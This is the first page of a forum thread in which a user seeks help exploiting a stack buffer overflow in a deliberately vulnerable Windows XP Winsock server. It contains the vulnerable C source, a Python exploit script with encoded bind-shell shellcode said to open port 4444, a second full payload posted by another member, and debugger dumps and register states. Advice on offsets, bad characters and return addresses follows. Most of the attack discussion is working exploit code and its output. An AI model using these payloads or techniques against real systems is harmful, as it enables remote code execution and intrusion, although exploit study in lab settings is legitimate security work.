Page 1 of 3 123 LastLast
Results 1 to 10 of 22

Thread: help in writing exploits stack overflow on xp sp2

  1. #1
    Just burned his ISO
    Join Date
    Jan 2007
    Posts
    9

    Default help in writing exploits stack overflow on xp sp2

    I am bit new to exploitation.But I know the basics.I have to write exploit for the following C code
    ---------------------------------------------------
    #include <iostream>
    #include <winsock.h>
    #include <windows.h>

    //load windows socket
    #pragma comment(lib, "wsock32.lib")

    //Define Return Messages
    #define SS_ERROR 1
    #define SS_OK 0


    void pr( char *str)
    {
    char buf[500]="";
    strcpy(buf,str);
    }
    void sError(char *str)
    {
    MessageBox (NULL, str, "socket Error" ,MB_OK);
    WSACleanup();
    }


    int main(int argc, char **argv)
    {



    WORD sockVersion;
    WSADATA wsaData;

    int rVal;
    char Message[5000]="";
    char buf[2000]="";

    u_short LocalPort;
    LocalPort = 200;

    //wsock32 initialized for usage
    sockVersion = MAKEWORD(1,1);
    WSAStartup(sockVersion, &wsaData);

    //create server socket
    SOCKET serverSocket = socket(AF_INET, SOCK_STREAM, 0);

    if(serverSocket == INVALID_SOCKET)
    {
    sError("Failed socket()");
    return SS_ERROR;
    }

    SOCKADDR_IN sin;
    sin.sin_family = PF_INET;
    sin.sin_port = htons(LocalPort);
    sin.sin_addr.s_addr = INADDR_ANY;

    //bind the socket
    rVal = bind(serverSocket, (LPSOCKADDR)&sin, sizeof(sin));
    if(rVal == SOCKET_ERROR)
    {
    sError("Failed bind()");
    WSACleanup();
    return SS_ERROR;
    }

    //get socket to listen
    rVal = listen(serverSocket, 10);
    if(rVal == SOCKET_ERROR)
    {
    sError("Failed listen()");
    WSACleanup();
    return SS_ERROR;
    }

    //wait for a client to connect
    SOCKET clientSocket;
    clientSocket = accept(serverSocket, NULL, NULL);
    if(clientSocket == INVALID_SOCKET)
    {
    sError("Failed accept()");
    WSACleanup();
    return SS_ERROR;
    }

    int bytesRecv = SOCKET_ERROR;
    while( bytesRecv == SOCKET_ERROR )
    {
    //receive the data that is being sent by the client max limit to 5000 bytes.
    bytesRecv = recv( clientSocket, Message, 5000, 0 );

    if ( bytesRecv == 0 || bytesRecv == WSAECONNRESET )
    {
    printf( "\nConnection Closed.\n");
    break;
    }
    }

    //Pass the data received to the function pr
    pr(Message);

    //close client socket
    closesocket(clientSocket);
    //close server socket
    closesocket(serverSocket);

    WSACleanup();

    return SS_OK;
    }
    ----------------------------------------------------

    I complied the code on decpp on windows xp sp2 (so no stack protection canarie)
    After sending a pattern I find out that ECX points to the first character of our input eip overwritten at 524 bytes.
    ESP points to string at the 528 character

    so I find a jmp ECX.
    and create a pattern like [AAA...524][BBBB][CCCC..]
    I find EIP overwritten with BBBB
    So in explot I replace BBBB with the address of JMP ECX

    So I send the following exploit

    C:>python exploit.py|nc localhost 200
    exploit.py
    -------------------------------------------------------------------------

    buffer = '\x90' * 100


    buffer += "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\ x81\x73\x13\x85"
    buffer += "\x3f\x2a\xbd\x83\xeb\xfc\xe2\xf4\x79\x55\xc1\xf0\ x6d\xc6\xd5\x42"
    buffer += "\x7a\x5f\xa1\xd1\xa1\x1b\xa1\xf8\xb9\xb4\x56\xb8\ xfd\x3e\xc5\x36"
    buffer += "\xca\x27\xa1\xe2\xa5\x3e\xc1\xf4\x0e\x0b\xa1\xbc\ x6b\x0e\xea\x24"
    buffer += "\x29\xbb\xea\xc9\x82\xfe\xe0\xb0\x84\xfd\xc1\x49\ xbe\x6b\x0e\x95"
    buffer += "\xf0\xda\xa1\xe2\xa1\x3e\xc1\xdb\x0e\x33\x61\x36\ xda\x23\x2b\x56"
    buffer += "\x86\x13\xa1\x34\xe9\x1b\x36\xdc\x46\x0e\xf1\xd9\ x0e\x7c\x1a\x36"
    buffer += "\xc5\x33\xa1\xcd\x99\x92\xa1\xfd\x8d\x61\x42\x33\ xcb\x31\xc6\xed"
    buffer += "\x7a\xe9\x4c\xee\xe3\x57\x19\x8f\xed\x48\x59\x8f\ xda\x6b\xd5\x6d"
    buffer += "\xed\xf4\xc7\x41\xbe\x6f\xd5\x6b\xda\xb6\xcf\xdb\ x04\xd2\x22\xbf"
    buffer += "\xd0\x55\x28\x42\x55\x57\xf3\xb4\x70\x92\x7d\x42\ x53\x6c\x79\xee"
    buffer += "\xd6\x6c\x69\xee\xc6\x6c\xd5\x6d\xe3\x57\x3b\xe1\ xe3\x6c\xa3\x5c"
    buffer += "\x10\x57\x8e\xa7\xf5\xf8\x7d\x42\x53\x55\x3a\xec\ xd0\xc0\xfa\xd5"
    buffer += "\x21\x92\x04\x54\xd2\xc0\xfc\xee\xd0\xc0\xfa\xd5\ x60\x76\xac\xf4"
    buffer += "\xd2\xc0\xfc\xed\xd1\x6b\x7f\x42\x55\xac\x42\x5a\ xfc\xf9\x53\xea"
    buffer += "\x7a\xe9\x7f\x42\x55\x59\x40\xd9\xe3\x57\x49\xd0\ x0c\xda\x40\xed"
    buffer += "\xdc\x16\xe6\x34\x62\x55\x6e\x34\x67\x0e\xea\x4e\ x2f\xc1\x68\x90"
    buffer += "\x7b\x7d\x06\x2e\x08\x45\x12\x16\x2e\x94\x42\xcf\ x7b\x8c\x3c\x42"
    buffer += "\xf0\x7b\xd5\x6b\xde\x68\x78\xec\xd4\x6e\x40\xbc\ xd4\x6e\x7f\xec"
    buffer += "\x7a\xef\x42\x10\x5c\x3a\xe4\xee\x7a\xe9\x40\x42\ x7a\x08\xd5\x6d"
    buffer += "\x0e\x68\xd6\x3e\x41\x5b\xd5\x6b\xd7\xc0\xfa\xd5\ x75\xb5\x2e\xe2"
    buffer += "\xd6\xc0\xfc\x42\x55\x3f\x2a\xbd"

    buffer += '\x90' * 100
    buffer += '\xC3\x2C\x82\x77' #jmp ECX
    buffer += '\x90'*100

    print buffer


    #jmp eax 77822CC3,7C85D2F4 shellcode size 324 eip overwrites at 524
    -----------------------------------------------------------
    The above shellcode is for tcp connect opens a port at 4444.I have tested the shellcode.It works fine .
    But I dont find the exploit working.
    I simply crashes the program.
    Please suggest me why so.
    I have tested with some other shellcodes also like calculator.exe still not working
    Please help as soon as possible

  2. #2
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default

    Don't know, what debugger are you useing
    \xC3\x2C\x82\x77'
    That looks like kernel address?

  3. #3
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    Why shouldn't he use the address?

    Who knows in which memory area his program is running so he might have the zero byte issue.
    Tiocfaidh ár lá

  4. #4
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default

    Why shouldn't he use the address?

    Who knows in which memory area his program is running so he might have the zero byte issue.
    I just guess it wasn't running in the place ntdll and kernel32 ran at, you never know of course, and I didn't say he can't use that address, if its a OS module then it proable would run there.

    might have the zero byte issue
    ? is that \x00, don't really understand the temernalogys.

  5. #5
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default

    This should work on XP pro sp3
    The jmp should be around this address 0040-0000, or anything else

    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA A"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA A"
    "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAA"
    "\x45\x95\x40\x00"
    "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\ x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
    "\x31\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\ x81\x73\x13\xcf"
    "\x7c\x0d\x58\x83\xeb\xfc\xe2\xf4\x33\x16\xe6\x15\ x27\x85\xf2\xa7"
    "\x30\x1c\x86\x34\xeb\x58\x86\x1d\xf3\xf7\x71\x5d\ xb7\x7d\xe2\xd3"
    "\x80\x64\x86\x07\xef\x7d\xe6\x11\x44\x48\x86\x59\ x21\x4d\xcd\xc1"
    "\x63\xf8\xcd\x2c\xc8\xbd\xc7\x55\xce\xbe\xe6\xac\ xf4\x28\x29\x70"
    "\xba\x99\x86\x07\xeb\x7d\xe6\x3e\x44\x70\x46\xd3\ x90\x60\x0c\xb3"
    "\xcc\x50\x86\xd1\xa3\x58\x11\x39\x0c\x4d\xd6\x3c\ x44\x3f\x3d\xd3"
    "\x8f\x70\x86\x28\xd3\xd1\x86\x18\xc7\x22\x65\xd6\ x81\x72\xe1\x08"
    "\x30\xaa\x6b\x0b\xa9\x14\x3e\x6a\xa7\x0b\x7e\x6a\ x90\x28\xf2\x88"
    "\xa7\xb7\xe0\xa4\xf4\x2c\xf2\x8e\x90\xf5\xe8\x3e\ x4e\x91\x05\x5a"
    "\x9a\x16\x0f\xa7\x1f\x14\xd4\x51\x3a\xd1\x5a\xa7\ x19\x2f\x5e\x0b"
    "\x9c\x2f\x4e\x0b\x8c\x2f\xf2\x88\xa9\x14\x1c\x04\ xa9\x2f\x84\xb9"
    "\x5a\x14\xa9\x42\xbf\xbb\x5a\xa7\x19\x16\x1d\x09\ x9a\x83\xdd\x30"
    "\x6b\xd1\x23\xb1\x98\x83\xdb\x0b\x9a\x83\xdd\x30\ x2a\x35\x8b\x11"
    "\x98\x83\xdb\x08\x9b\x28\x58\xa7\x1f\xef\x65\xbf\ xb6\xba\x74\x0f"
    "\x30\xaa\x58\xa7\x1f\x1a\x67\x3c\xa9\x14\x6e\x35\ x46\x99\x67\x08"
    "\x96\x55\xc1\xd1\x28\x16\x49\xd1\x2d\x4d\xcd\xab\ x65\x82\x4f\x75"
    "\x31\x3e\x21\xcb\x42\x06\x35\xf3\x64\xd7\x65\x2a\ x31\xcf\x1b\xa7"
    "\xba\x38\xf2\x8e\x94\x2b\x5f\x09\x9e\x2d\x67\x59\ x9e\x2d\x58\x09"
    "\x30\xac\x65\xf5\x16\x79\xc3\x0b\x30\xaa\x67\xa7\ x30\x4b\xf2\x88"
    "\x44\x2b\xf1\xdb\x0b\x18\xf2\x8e\x9d\x83\xdd\x30\ x3f\xf6\x09\x07"
    "\x9c\x83\xdb\xa7\x1f\x7c\x0d\x58";

  6. #6
    Just burned his ISO
    Join Date
    Jan 2007
    Posts
    9

    Default

    hi compaq,
    dont u think 00 is a null character and the program would stop reading the input after it encounters that whether it is sp3 or any other service pack

  7. #7
    Just burned his ISO
    Join Date
    Jan 2007
    Posts
    9

    Default

    I have taken snaps of olly when I ran the exploit.I suppose it's taking 90909090 as some address.
    Snapshot of memory dump.I dont think the code has altered any of the input characters I mean there are no badchars except \x00

    0022DFF0 90 90 90 90 90 90 90 90 
    0022DFF8 90 90 90 90 90 90 90 90 
    0022E000 90 90 90 90 90 90 90 90 
    0022E008 90 90 90 90 90 90 90 90 
    0022E010 90 90 90 90 90 90 90 90 
    0022E018 90 90 90 90 90 90 90 90 
    0022E020 90 90 90 90 90 90 90 90 
    0022E028 90 90 90 90 90 90 90 90 
    0022E030 90 90 90 90 90 90 90 90 
    0022E038 90 90 90 90 90 90 90 90 
    0022E040 90 90 90 90 90 90 90 90 
    0022E048 90 90 90 90 90 90 90 90 
    0022E050 90 90 90 90 33 C9 83 E9 3Ƀé
    0022E058 B0 D9 EE D9 74 24 F4 5B °ÙîÙt$ô[
    0022E060 81 73 13 85 3F 2A BD 83 s …?*½ƒ
    0022E068 EB FC E2 F4 79 55 C1 F0 ëüâôyUÁð
    0022E070 6D C6 D5 42 7A 5F A1 D1 mÆÕBz_¡Ñ
    0022E078 A1 1B A1 F8 B9 B4 56 B8 ¡ ¡ø¹´V¸
    0022E080 FD 3E C5 36 CA 27 A1 E2 ý>Å6Ê'¡â
    0022E088 A5 3E C1 F4 0E 0B A1 BC ¥>Áô¡¼
    0022E090 6B 0E EA 24 29 BB EA C9 kê$)»êÉ
    0022E098 82 FE E0 B0 84 FD C1 49 ‚þà°„ýÁI
    0022E0A0 BE 6B 0E 95 F0 DA A1 E2 ¾k•ðÚ¡â
    0022E0A8 A1 3E C1 DB 0E 33 61 36 ¡>ÁÛ3a6
    0022E0B0 DA 23 2B 56 86 13 A1 34 Ú#+V† ¡4
    0022E0B8 E9 1B 36 DC 46 0E F1 D9 é 6ÜFñÙ
    0022E0C0 0E 7C 1A 36 C5 33 A1 CD | 6Å3¡Í
    0022E0C8 99 92 A1 FD 8D 61 42 33 ™’¡ýaB3
    0022E0D0 CB 31 C6 ED 7A E9 4C EE Ë1ÆízéLî
    0022E0D8 E3 57 19 8F ED 48 59 8F ãW íHY
    0022E0E0 DA 6B D5 6D ED F4 C7 41 ÚkÕmíôÇA
    0022E0E8 BE 6F D5 6B DA B6 CF DB ¾oÕkÚ¶ÏÛ
    0022E0F0 04 D2 22 BF D0 55 28 42 Ò"¿ÐU(B
    0022E0F8 55 57 F3 B4 70 92 7D 42 UWó´p’}B
    0022E100 53 6C 79 EE D6 6C 69 EE SlyîÖliî
    0022E108 C6 6C D5 6D E3 57 3B E1 ÆlÕmãW;á
    0022E110 E3 6C A3 5C 10 57 8E A7 ãl£\ WŽ§
    0022E118 F5 F8 7D 42 53 55 3A EC õø}BSU:ì
    0022E120 D0 C0 FA D5 21 92 04 54 ÐÀúÕ!’ T
    0022E128 D2 C0 FC EE D0 C0 FA D5 ÒÀüîÐÀúÕ
    0022E130 60 76 AC F4 D2 C0 FC ED `v¬ôÒÀüí
    0022E138 D1 6B 7F 42 55 AC 42 5A ÑkBU¬BZ
    0022E140 FC F9 53 EA 7A E9 7F 42 üùSêzéB
    0022E148 55 59 40 D9 E3 57 49 D0 UY@ÙãWIÐ
    0022E150 0C DA 40 ED DC 16 E6 34 .Ú@íÜ æ4
    0022E158 62 55 6E 34 67 0E EA 4E bUn4gêN
    0022E160 2F C1 68 90 7B 7D 06 2E /Áh{} .
    0022E168 08 45 12 16 2E 94 42 CF E .”BÏ
    0022E170 7B 8C 3C 42 F0 7B D5 6B {Œ<Bð{Õk
    0022E178 DE 68 78 EC D4 6E 40 BC ÞhxìÔn@¼
    0022E180 D4 6E 7F EC 7A EF 42 10 ÔnìzïB
    0022E188 5C 3A E4 EE 7A E9 40 42 \:äîzé@B
    0022E190 7A 08 D5 6D 0E 68 D6 3E z ÕmhÖ>
    0022E198 41 5B D5 6B D7 C0 FA D5 A[Õk×ÀúÕ
    0022E1A0 75 B5 2E E2 D6 C0 FC 42 uµ.âÖÀüB
    0022E1A8 55 3F 2A BD 90 90 90 90 U?*½
    0022E1B0 90 90 90 90 90 90 90 90 
    0022E1B8 90 90 90 90 90 90 90 90 
    0022E1C0 90 90 90 90 90 90 90 90 
    0022E1C8 90 90 90 90 90 90 90 90 
    0022E1D0 90 90 90 90 90 90 90 90 
    0022E1D8 90 90 90 90 90 90 90 90 
    0022E1E0 90 90 90 90 90 90 90 90 
    0022E1E8 90 90 90 90 90 90 90 90 
    0022E1F0 90 90 90 90 90 90 90 90 
    0022E1F8 90 90 90 90 90 90 90 90 
    0022E200 90 90 90 90 90 90 90 90 
    0022E208 90 90 90 90 90 90 90 90 
    0022E210 C3 2C 82 77 90 90 90 90 Ã,‚w
    0022E218 90 90 90 90 90 90 90 90 
    0022E220 90 90 90 90 90 90 90 90 
    0022E228 90 90 90 90 90 90 90 90 
    0022E230 90 90 90 90 90 90 90 90 
    0022E238 90 90 90 90 90 90 90 90 
    0022E240 90 90 90 90 90 90 90 90 
    0022E248 90 90 90 90 90 90 90 90 
    0022E250 90 90 90 90 90 90 90 90 
    0022E258 90 90 90 90 90 90 90 90 
    0022E260 90 90 90 90 90 90 90 90 
    0022E268 90 90 90 90 90 90 90 90 
    0022E270 90 90 90 90 90 90 90 90 

    Snapshot of registers
    EAX 0022DFF0
    ECX 0022ECBC
    EDX 00000A0D
    EBX 00004000
    ESP 0022E200
    EBP 90909090
    ESI FFFFFFFF
    EDI 7C910738 ntdll.7C910738
    EIP 90909090
    C 0 ES 0023 32bit 0(FFFFFFFF)
    P 1 CS 001B 32bit 0(FFFFFFFF)
    A 0 SS 0023 32bit 0(FFFFFFFF)
    Z 1 DS 0023 32bit 0(FFFFFFFF)
    S 0 FS 003B 32bit 7FFDF000(FFF)
    T 0 GS 0000 NULL
    D 0
    O 0 LastErr ERROR_SUCCESS (00000000)
    EFL 00010246 (NO,NB,E,BE,NS,PE,GE,LE)
    ST0 empty -UNORM BDEC 01050104 0067006E
    ST1 empty +UNORM 0079 006C006C 006F005C
    ST2 empty +UNORM 0020 00300031 002E0031
    ST3 empty +UNORM 006C 006F005C 0064006F
    ST4 empty +UNORM 006E 0069002E 00670062
    ST5 empty 0.0
    ST6 empty 0.0
    ST7 empty 0.0
    3 2 1 0 E S P U O Z D I
    FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
    FCW 037F Prec NEAR,64 Mask 1 1 1 1 1 1

  8. #8
    Good friend of the forums
    Join Date
    Jun 2008
    Posts
    425

    Default

    #jmp eax 77822CC3,7C85D2F4 shellcode size 324 eip overwrites at 524
    the 524 should be 508. 100nop--324sheelcode--80nop--\xC3\x2C\x82\x77address pointing to first 100nop
    It might be easyer to fill up the buffer with junk like AA put you jmp address then the nops and then shellcode, it just save you have to work out the size of the shellcode.

    hi compaq,
    dont u think 00 is a null character and the program would stop reading the input after it encounters that whether it is sp3 or any other service pack
    Just wondering if "might have the zero byte issue" means badchars.

  9. #9
    Just burned his ISO
    Join Date
    Jan 2007
    Posts
    9

    Default

    The first NOP's I mean the beginnng of the shellcodes are being pointed by ECX if I m not wrong so should'nt jmp ECX instruction should work.I'd like to know which machine u tried as I find after 524 bytes is eip is overwritten.If you can Please try it on some xp sp2 machine and tell me where I m going wrong.

  10. #10
    Moderator KMDave's Avatar
    Join Date
    Jan 2010
    Posts
    2,281

    Default

    With the zero byte issue I mean \x00 which won't work since it will be considered as the escape char for a string and therefor it will make the exploit fail.

    Yes the \x00 is the badchar for nearly every exploit (unicode is a little different).

    Also a Jump ECX will not work with Windows XP.
    Tiocfaidh ár lá

Page 1 of 3 123 LastLast

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •